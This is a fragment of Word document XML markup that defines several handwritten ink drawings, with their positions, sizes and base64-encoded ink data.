              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:278.3pt;margin-top:25.8pt;height:7.1pt;width:27pt;z-index:251665408;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAHb7ya9UAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMBBE70j8g7VI3KjjSo2qEKdCtBwRpOUDnHibRLXX&#10;Uew05e9ZTnDaWe1o9k25u3knrjjFIZAGtcpAILXBDtRp+Dq9PW1BxGTIGhcINXxjhF11f1eawoaF&#10;arweUyc4hGJhNPQpjYWUse3Rm7gKIxLfzmHyJvE6ddJOZuFw7+Q6y3LpzUD8oTcjvvbYXo6z11B/&#10;XM57R751B1Pvm4Nf3ueXT60fH1T2DCLhLf2Z4Ref0aFipibMZKNwGjabPGcrC8WTDblaKxANi60C&#10;WZXyf4PqB1BLAwQUAAAACACHTuJACT6pM58BAACKAwAADgAAAGRycy9lMm9Eb2MueG1srVNLTsMw&#10;EN0jcQfLexonTWkbNWVBhcSC0gUcwDh2YxHb0dht2uuw4gqsOA0Sx2D6o6UICSF2nnmjN+/NkwcX&#10;C1ORuQSvnc1p3GKUSCtcoe00p/d3V2c9SnzgtuCVszKnS+npxfD0ZNDUmUxc6apCAkES67OmzmkZ&#10;Qp1FkRelNNy3XC0tgsqB4QFLmEYF8AbZTRUljJ1HjYOiBiek99gdbUC6ZYTfEDqltJAjJ2ZG2rBh&#10;BVnxgJZ8qWtPh2u1SkkRbpXyMpAKvfZZh5KQ03bcxQeu6p4naP8BoThtMxoNBzybAq9LLbZ6+G/0&#10;HBk0XFtU8Ek14oGTGehvVEYLcN6p0BLORBtX6/OgpZgdHeraPq5sxamYQSacDWh9wiHsolgDf1lh&#10;KjxBc+MKDFtU8M9JEMh0kVO4LuK9fDu/3BuYwN7WeD4BsppPU0osNyjp7en5/fWFYAPj2dkffyVA&#10;JNpCP1EvFJhVJnhlskD+JGFJjOEvc9rrdJMO28YvF4EIHGinSR97ROBAn8XdNbxbsiHbVQdhoI4v&#10;sR/WK40HX2j4AVBLAwQKAAAAAACHTuJAAAAAAAAAAAAAAAAACAAAAGRycy9pbmsvUEsDBBQAAAAI&#10;AIdO4kB7n0eQswIAAIMGAAAQAAAAZHJzL2luay9pbmsxLnhtbLVUS2vbQBC+F/ofls0hh2rlfehp&#10;4uRQCBRaCEkK7VGRN7aIHma1jp1/329Xshwap1BofZjxzOz3zWNndXG1b2ryrE1fde2CipBTotuy&#10;W1btakG/31+zjJLeFu2yqLtWL+iL7unV5ccPF1X71NRzSAKGtnf/mnpB19Zu5rPZbrcLdyrszGom&#10;OVezL+3Tt6/0ckQt9WPVVhYp+4Or7Fqr99aRzavlgpZ2z6fz4L7rtqbUU9h5THk8YU1R6uvONIWd&#10;GNdF2+qatEWDun9QYl82+FMhz0obSraooEeihs5OQ37+PeT6DaQp9hgrl+q3hDM/r/n7dd+YbqON&#10;rfRxRENDY+CFlIPtexuaNLrv6q2bKyXPRb1FuzILVZREcZLkMhcqmsoQsxOdv+XGEP4bN6b1PneY&#10;RSJJ35Q7zm3s/fWQxsi0K4dLtVWjscHNZloe22PLnfvOGr/nkkvBhGQ8vRfJXKl5FLulOOQaVvPA&#10;92C2/XriejDHJfSRaYRDa7tqadfTbfCQC8kVz3iqpEpjhdd1Yg9PEa11tVrbf8FUdnWH/R8X5Iz7&#10;3/ERnEr+WNn77vPWPOsJJ/6MqFZtZ/QNNrLfmiOKv5qrTzRN+cQ3wT8OMn4ZbvXjgp75zwLxyMHh&#10;5x8lecyJCGWa5bH+xBOSCRmcs1SeR9k5D2hCmaI8SJkiPEiYhExZAin4a5V7AxEmEJeQCRDS44Q7&#10;K2EI4EgciJhwJuBNBxOsLAlEDoDyCmhYkkQBi5hiacBkRASCTIKfiNGWAYIRDkuF7CqQoGGxV4Bi&#10;LRFiIiep1xlxVXsbDApQGciYZXBCCQzB6RwminUIGQ8IaBQ62s6PEnyymHmVOqRiMfgghvJS4gbB&#10;ZAYo3NBoEsljErk5QKIZ0KBcSNeRQrnuJNr2FmznVCQ6PCZ/p9Ol47Fe/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CsIAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAA&#10;9gUAAF9yZWxzL1BLAQIUABQAAAAIAIdO4kCKFGY80QAAAJQBAAALAAAAAAAAAAEAIAAAABoGAABf&#10;cmVscy8ucmVsc1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAEAAAAAAAAABk&#10;cnMvUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAoAAAAAAAAAAAAQAAAAFAcAAGRycy9fcmVs&#10;cy9QSwECFAAUAAAACACHTuJAeRi8nbgAAAAhAQAAGQAAAAAAAAABACAAAAA8BwAAZHJzL19yZWxz&#10;L2Uyb0RvYy54bWwucmVsc1BLAQIUABQAAAAIAIdO4kAdvvJr1QAAAAkBAAAPAAAAAAAAAAEAIAAA&#10;ACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJACT6pM58BAACKAwAADgAAAAAAAAAB&#10;ACAAAAAkAQAAZHJzL2Uyb0RvYy54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACAAAAAAA&#10;AAAAABAAAADvAgAAZHJzL2luay9QSwECFAAUAAAACACHTuJAe59HkLMCAACDBgAAEAAAAAAAAAAB&#10;ACAAAAAVAwAAZHJzL2luay9pbmsxLnhtbFBLBQYAAAAACgAKAEwCAABhCQAAAAA=&#10;">
                <v:imagedata r:id="rId54" o:title=""/>
                <o:lock v:ext="edit"/>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3565525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>354330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="117475" cy="529590"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="45" name="墨迹 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId55">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="45" name="墨迹 45"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4251325" y="8599170"/>
                            <a:ext cx="117475" cy="529590"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:280.75pt;margin-top:27.9pt;height:41.7pt;width:9.25pt;z-index:251666432;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;wz+ciwISjuRw5cLZT82BK33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B5GLyduAAAACEBAAAZAAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVs&#10;c4XPsWrEMAwG4L3QdzDaGyUdylHiZDkOspYUbjWOkpjEsrGc0nv7euzBwQ0ahND3S23/63f1Q0lc&#10;YA1NVYMitmFyvGj4Hi9vJ1CSDU9mD0wabiTQd68v7RftJpclWV0UVRQWDWvO8RNR7EreSBUicZnM&#10;IXmTS5sWjMZuZiF8r+sPTP8N6O5MNUwa0jA1oMZbLMnP7TDPztI52MMT5wcRaA/JwV/9XlCTFsoa&#10;HG9YqqnKoYBdi3ePdX9QSwMEFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAABbQ29udGVudF9UeXBl&#10;c10ueG1slZHBTsMwEETvSPyD5StKnPaAEGrSAylHQKh8gGVvEqv22vKa0P49TtpeEKXi4IO9M29G&#10;69V67ywbIZLxWPNFWXEGqLw22Nf8Y/tcPHBGSaKW1iPU/ADE183tzWp7CEAsu5FqPqQUHoUgNYCT&#10;VPoAmCedj06mfI29CFLtZA9iWVX3QnlMgKlIE4M3qxY6+WkT2+zz87FJBEucPR2FU1bNZQjWKJly&#10;UzGi/pFSnBLK7Jw1NJhAd7kGF78mTJPLASffa15NNBrYm4zpRbpcQ+hIQvsvjDCWf0Omlo4K33VG&#10;QdlGarPtHcZzq0t0WPrWq//CN7PrGtvgTuSzuELPEmfPLDF/dvMNUEsBAhQAFAAAAAgAh07iQAMV&#10;KdoFAQAALQIAABMAAAAAAAAAAQAgAAAASwgAAFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAA&#10;AACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAAABAAAAAWBgAAX3JlbHMvUEsBAhQAFAAAAAgAh07i&#10;QIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAAOgYAAF9yZWxzLy5yZWxzUEsBAhQACgAAAAAAh07i&#10;QAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAAAAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAA&#10;AAAAAAAACgAAAAAAAAAAABAAAAA0BwAAZHJzL19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAA&#10;ACEBAAAZAAAAAAAAAAEAIAAAAFwHAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAA&#10;AAgAh07iQBTMWDjaAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIU&#10;ABQAAAAIAIdO4kC4r4LBoQEAAIsDAAAOAAAAAAAAAAEAIAAAACkBAABkcnMvZTJvRG9jLnhtbFBL&#10;AQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAEAAAAPYCAABkcnMvaW5rL1BLAQIU&#10;ABQAAAAIAIdO4kCXrSnBzAIAAKkGAAAQAAAAAAAAAAEAIAAAABwDAABkcnMvaW5rL2luazEueG1s&#10;UEsFBgAAAAAKAAoATAIAAIEJAAAAAA==&#10;">
                <v:imagedata r:id="rId56" o:title=""/>
                <o:lock v:ext="edit"/>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3759200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>318135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="378460" cy="472440"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="46" name="墨迹 46"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId57">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="46" name="墨迹 46"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4445000" y="8562975"/>
                            <a:ext cx="378460" cy="472440"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:296pt;margin-top:25.05pt;height:37.2pt;width:29.8pt;z-index:251667456;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAaeHizNoAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2Py07DMBBF90j8gzVI7KidVElpiNMFggCriEJZu/E0iYjt&#10;yHYf9Os7rGA3ozm6c265OpmRHdCHwVkJyUwAQ9s6PdhOwufH8909sBCV1Wp0FiX8YIBVdX1VqkK7&#10;o33Hwzp2jEJsKJSEPsap4Dy0PRoVZm5CS7ed80ZFWn3HtVdHCjcjT4XIuVGDpQ+9mvCxx/Z7vTcS&#10;Fs3bU93UzeKMm5352vh5/bp8kfL2JhEPwCKe4h8Mv/qkDhU5bd3e6sBGCdkypS6RBpEAIyDP5hmw&#10;LZFpngOvSv6/QnUBUEsDBBQAAAAIAIdO4kBUgirhpQEAAIsDAAAOAAAAZHJzL2Uyb0RvYy54bWyt&#10;k01OwzAQhfdI3MHynuanSX+ipl1QIbEAuoADGMduLGI7GrtNuQ4rrsCK0yBxDKZNS0sREkLsYo/1&#10;zXvzJqPJSldkKcApa3IadUJKhOG2UGae07vbi7MBJc4zU7DKGpHTR+HoZHx6MmrqTMS2tFUhgCDE&#10;uKypc1p6X2dB4HgpNHMdWwuDRWlBM49HmAcFsAbpugriMOwFjYWiBsuFc3g7bYt0S4TfAK2Uioup&#10;5QstjG+pICrm0ZIrVe3oeKNWSsH9jZROeFLlNE4TNOtz2o36KSXYapjG+HGPYwijXkiD8Yhlc2B1&#10;qfhWD/uNniODmimDCj5RU+YZWYD6htKKg3VW+g63OmhdbcaDlqLwaFCX5mFtK0r4AjJujUfrMwZ+&#10;F8Wm8JcWusIRNFe2wLB5Bf+cBIFMFTmFyyLayzfL872BGextXS9nQNbvkx4lhmmU9Pb0/P76QvAC&#10;49nZv/4KwEqwLf2EXknQ60xwymSF/CRJwxDX4TGng7QXD3EjNvGLlSccH3T7gwRXgnB8kPTjBFfn&#10;oEtL2/U8SAOFfMn98LwWefAPjT8AUEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAZHJzL2lu&#10;ay9QSwMEFAAAAAgAh07iQMQZD/L8AgAAJQcAABAAAABkcnMvaW5rL2luazEueG1stVRNa9tAEL0X&#10;+h+WzSGHSvaudvVl4uRQCBRaCE0K7VGRN7aIJZnVOnb+fd+sZDkkTqHQ+uDZnZn3ZuZppIurfb1m&#10;T8Z2VdvMuZwIzkxTtouqWc75j7vrMOOsc0WzKNZtY+b82XT86vLjh4uqeazXM/wzMDQdner1nK+c&#10;28ym091uN9mpSWuX00gINf3SPH77yi8H1MI8VE3lULI7uMq2cWbviGxWLea8dHsx5oP7tt3a0oxh&#10;8tjymOFsUZrr1taFGxlXRdOYNWuKGn3/5Mw9b3CoUGdpLGdbdNChUM2npyG//h5y/QZSF3vIKiL1&#10;quDU6zV7v+8b226MdZU5StQPNASeWdnf/Wz9kNZ07XpLunL2VKy3GDfKJkonOk6SPMql0mMbcnpi&#10;8rfcEOG/cUOt97knmZZJ+qbdQbdh9pciDZFxVw4P1VW1wQbXm3F5XIctJ/ets37PIxHJUEahSO9k&#10;MlNqpmNaikOtfjUPfPd2261Grnt7XEIfGSXsR9tVC7can4aYCKmEzJJcCJ0nOnu9Fv1WnCJamWq5&#10;cv+CqWzXLfZ/WJAz4X/Hl+BU8YfK3bWft/bJjDj5Z0S1bFprbrCR3dYeUeKFrr7QqPKJb4J/Odjw&#10;ZfhuHub8zH8WmEf2Dq+/ztNYMDmJ0kzG5pNIWBrL4DzU+lwn56HKAi4VD2OeJQEecxrqPJAqjJkI&#10;QsmkYApWsigLJQ6aDoMnZ3EQKpbCG0iBHWFggFVMBzldAcBf5hkiFmONwIBo7rm9BwyaaQlEylQM&#10;5gQGQNxQyjcCVBShXXjJKrIK9xBVc/IjjWzYW6re3xW6AJkKRBhRFCYB2N9kAA/1gYYVNeYtooBI&#10;uNE/5SKDyggmiBUGmRATEQikaR40StOgDJmc+SFh0FVIYpBY2XAFxLtzhioIww8yHJAPbhwwuj8g&#10;onoGhmeCXGTQ4JSR+swMXD1UYTTi6uMpS6gtPDGMAIuswyOkEYnJA9Eu4WEIHvkBqU8FkX0GDFSG&#10;1GQOr7vfunEt8UJe/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H8IAABbQ29udGVudF9UeXBlc10ueG1sUEsBAhQACgAAAAAAh07i&#10;QAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAASgYAAF9yZWxzL1BLAQIUABQAAAAIAIdO4kCKFGY8&#10;0QAAAJQBAAALAAAAAAAAAAEAIAAAAG4GAABfcmVscy8ucmVsc1BLAQIUAAoAAAAAAIdO4kAAAAAA&#10;AAAAAAAAAAAEAAAAAAAAAAAAEAAAAAAAAABkcnMvUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAA&#10;AAoAAAAAAAAAAAAQAAAAaAcAAGRycy9fcmVscy9QSwECFAAUAAAACACHTuJAeRi8nbgAAAAhAQAA&#10;GQAAAAAAAAABACAAAACQBwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLAQIUABQAAAAIAIdO&#10;4kBp4eLM2gAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJAVIIq4aUBAACLAwAADgAAAAAAAAABACAAAAApAQAAZHJzL2Uyb0RvYy54bWxQSwECFAAK&#10;AAAAAACHTuJAAAAAAAAAAAAAAAAACAAAAAAAAAAAABAAAAD6AgAAZHJzL2luay9QSwECFAAUAAAA&#10;CACHTuJAxBkP8vwCAAAlBwAAEAAAAAAAAAABACAAAAAgAwAAZHJzL2luay9pbmsxLnhtbFBLBQYA&#10;AAAACgAKAEwCAAC1CQAAAAA=&#10;">
                <v:imagedata r:id="rId58" o:title=""/>
                <o:lock v:ext="edit"/>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4212590</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>258445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="362585" cy="163195"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="48" name="墨迹 48"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId59">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="48" name="墨迹 48"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4898390" y="8503285"/>
                            <a:ext cx="362585" cy="163195"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:331.7pt;margin-top:20.35pt;height:12.85pt;width:28.55pt;z-index:251669504;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;l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B0CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAA&#10;AAAGAAAAAAAAAAAAEAAAAD8GAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAA&#10;AAAAAAABACAAAABjBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAA&#10;AAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAA&#10;EAAAAF0HAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAg&#10;AAAAhQcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJA/G7sKtkAAAAJ&#10;AQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQJmDT0ak&#10;AQAAigMAAA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAA&#10;AAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA+AIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQO9Fsyfz&#10;AgAA+wYAABAAAAAAAAAAAQAgAAAAHgMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAA&#10;qgkAAAAA&#10;">
                <v:imagedata r:id="rId60" o:title=""/>
                <o:lock v:ext="edit"/>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4377690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>13970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="139700" cy="697865"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="49" name="墨迹 49"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
